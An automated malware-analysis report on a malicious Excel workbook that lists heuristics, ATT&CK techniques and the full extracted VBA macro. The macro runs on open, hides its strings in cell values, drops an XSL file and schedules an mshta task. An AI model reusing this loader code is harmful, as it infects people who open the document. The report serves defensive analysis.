Verdict: MALICIOUS
Risk Score: 176

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1218 System Binary Proxy Execution

The critical heuristic 'OLE_VBA_LOLBIN' and the high heuristic 'OLE_VBA_PCODE_AUTOEXEC_EXEC' indicate that the VBA macro is designed to execute a legitimate Windows binary (LOLBin) to perform malicious actions. The macro attempts to create a file named 'xHtmlCalc.xsl' in the ALLUSERSPROFILE directory, which is a common technique for downloading and executing further stages of malware; in the extracted script, the text written to that file is built from cell values on Sheet1. The use of CreateObject and Schedule.Service suggests an attempt to schedule or execute a payload: the script registers a scheduled task named "2021 Updates" whose action path is "mshta".

Heuristics (6)

- VBA project inside OOXML (medium, OOXML_VBA, 5 related findings): Document contains a VBA project; VBA macros present.

- LOLBin reference in VBA (critical, OLE_VBA_LOLBIN): LOLBin reference in VBA. Matched line in script:

      Set xPaperEnvelopeC3 = xDataAndLabel.Actions.Create(xCSV)
      xPaperEnvelopeC3.Path = "mshta"
      xPaperEnvelopeC3.Arguments = xCellTypeSameFormatConditions

- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script:

      Next xZero
      With CreateObject("Scripting.FileSystemObject")
      Set xUpdateLinksAlways = .CreateTextFile(Environ("ALLUSERSPROFILE") & "\xHtmlCalc.xsl")

- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

- Workbook_Open macro (low, OLE_VBA_WBOPEN): Workbook_Open macro. Matched line in script:

      Attribute VB_Customizable = True
      Sub Workbook_Open()
      On Error GoTo xUnderlineStyleSingleAccounting

- Environ() call (env variable access) (low, OLE_VBA_ENVIRON): Environ() call (env variable access). Matched line in script:

      With CreateObject("Scripting.FileSystemObject")
      Set xUpdateLinksAlways = .CreateTextFile(Environ("ALLUSERSPROFILE") & "\xHtmlCalc.xsl")
      End With

Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3760 bytes |

SHA-256: 83aae2ffb4b73a503b329111c12650bc90bac85e1e1aa7b61397ec0e08910014

Preview script (first 1,000 lines of the extracted script):

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
On Error GoTo xUnderlineStyleSingleAccounting
xDialogSize = 1 / 0
xUnderlineStyleSingleAccounting:
If Err.Number <> 0 Then
xDialogGallery3dArea = "Thank You!"
MsgBox xDialogGallery3dArea, , "Good", Err.HelpFile, Err.HelpContext
xCalculationAutomatic = xTitleBar()
End If
End Sub
Function xTitleBar()
For Each xZero In ActiveWorkbook.Sheets("Sheet1").Range("AN53:CD3664")
If xZero.Value > 0 And Len(xCellTypeSameFormatConditions) < 199 Then
xCellTypeSameFormatConditions = xCellTypeSameFormatConditions & Chr(xZero.Value)
ElseIf xZero.Value > 0 Then
xRoutingInProgress = xRoutingInProgress & Chr(xZero.Value)
End If
Next xZero
With CreateObject("Scripting.FileSystemObject")
Set xUpdateLinksAlways = .CreateTextFile(Environ("ALLUSERSPROFILE") & "\xHtmlCalc.xsl")
End With
Const xSummaryOnRight = 1
Const xCSV = 0
Set xErrorBars = CreateObject("Schedule.Service")
Call xErrorBars.Connect
Set xExcel4 = xErrorBars.GetFolder("")
Set xDataAndLabel = xErrorBars.NewTask(0)
Set xDialogAutoCorrect = xDataAndLabel.RegistrationInfo
xDialogAutoCorrect.Description = "Updates"
xDialogAutoCorrect.Author = "The Company"
Set xDialogCreateNames = xDataAndLabel.Principal
xDialogCreateNames.LogonType = 3
Set xWorksheet = xDataAndLabel.Settings
xWorksheet.Enabled = True
xWorksheet.StartWhenAvailable = True
xWorksheet.Hidden = False
Set xRangeAutoFormatTable9 = xDataAndLabel.Triggers
Set xChartAsWindow = xRangeAutoFormatTable9.Create(xSummaryOnRight)
xFilterInPlace = DateAdd("s", 120, Now)
xLinkStatusMissingFile = xDialogPivotFieldUngroup(xFilterInPlace)
xFilterInPlace = DateAdd("n", 5, Now)
xListConflictDialog = xDialogPivotFieldUngroup(xFilterInPlace)
xChartAsWindow.StartBoundary = xLinkStatusMissingFile
With xUpdateLinksAlways
.Write xRoutingInProgress
End With
xChartAsWindow.EndBoundary = xListConflictDialog
xChartAsWindow.ID = "TimeTriggerId"
xChartAsWindow.Enabled = True
Set xPaperEnvelopeC3 = xDataAndLabel.Actions.Create(xCSV)
xPaperEnvelopeC3.Path = "mshta"
xPaperEnvelopeC3.Arguments = xCellTypeSameFormatConditions
Call xExcel4.RegisterTaskDefinition("2021 Updates", xDataAndLabel, 6, , , 3)
End Function
Function xDialogPivotFieldUngroup(xPaperEnvelopeB4)
xUnlockedCells = "0" & Second(xPaperEnvelopeB4)
xValidAlertStop = "0" & Minute(xPaperEnvelopeB4)
xErrRef = "0" & Hour(xPaperEnvelopeB4)
xDialogObjectProtection = "0" & Day(xPaperEnvelopeB4)
xWebFormattingAll = "0" & Month(xPaperEnvelopeB4)
xRangeAutoFormatTable1 = Year(xPaperEnvelopeB4)
xInsideVertical = Right(xErrRef, 2) & ":" & Right(xValidAlertStop, 2) & ":" & Right(xUnlockedCells, 2)
xListDataTypeDateTime = xRangeAutoFormatTable1 & "-" & Right(xWebFormattingAll, 2) & "-" & Right(xDialogObjectProtection, 2)
xDialogPivotFieldUngroup = xListDataTypeDateTime & "T" & xInsideVertical
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 16896 bytes |

SHA-256: 3ea86194501b6222ad9edb1f3a10df74b29141350839a41223fcacafd1f79230